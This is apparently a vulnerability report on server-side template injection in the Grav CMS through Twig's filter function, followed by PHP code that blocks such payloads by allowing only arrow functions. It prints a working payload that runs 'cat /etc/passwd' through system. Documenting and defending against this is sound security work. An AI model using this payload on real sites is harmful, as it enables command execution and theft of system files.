Grav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.
Payload:
{{['cat\x20/etc/passwd']|filter('system')}}
Advanced
tab.
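One way to refuse this kind of payload, shown as an added example that is not Grav's or Twig's own code: re-register Twig's `filter` so that it accepts only arrow functions and rejects string callables such as `system`. It assumes twig/twig 3.x installed with Composer; the name `closure_only_filter` and both template strings are constructed for illustration.

```php
<?php
// Added example. Assumes twig/twig 3.x is installed via Composer.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\RuntimeError;
use Twig\Loader\ArrayLoader;
use Twig\TwigFilter;

/**
 * Hypothetical replacement for the core `filter` filter.
 * Twig compiles arrow functions (v => ...) to \Closure objects, so anything
 * else (a string like 'system', or an array callable) is refused before
 * array_filter() can invoke it on attacker-chosen elements.
 */
function closure_only_filter($array, $arrow): array
{
    if (!$arrow instanceof \Closure) {
        throw new RuntimeError('|filter only accepts an arrow function.');
    }
    if (!is_iterable($array)) {
        throw new RuntimeError('|filter expects an array or Traversable.');
    }
    $items = is_array($array) ? $array : iterator_to_array($array);

    return array_filter($items, $arrow, ARRAY_FILTER_USE_BOTH);
}

// Constructed templates: one legitimate use, one shaped like the payload above.
$twig = new Environment(new ArrayLoader([
    'benign'  => "{{ [1, 2, 3]|filter(v => v > 1)|join(',') }}",
    'payload' => "{{ ['echo constructed']|filter('system') }}",
]));

// Filters added on the environment are initialised after the core extension,
// so this definition takes precedence over the built-in `filter`.
$twig->addFilter(new TwigFilter('filter', 'closure_only_filter'));

foreach (['benign', 'payload'] as $name) {
    try {
        echo $name, ': ', $twig->render($name), PHP_EOL;
    } catch (RuntimeError $e) {
        // The string callable is rejected; nothing is executed.
        echo $name, ': blocked (', $e->getRawMessage(), ')', PHP_EOL;
    }
}
```

Twig's other filters that take an arrow function (`map`, `reduce`, `sort`) accept callables the same way and need the same guard.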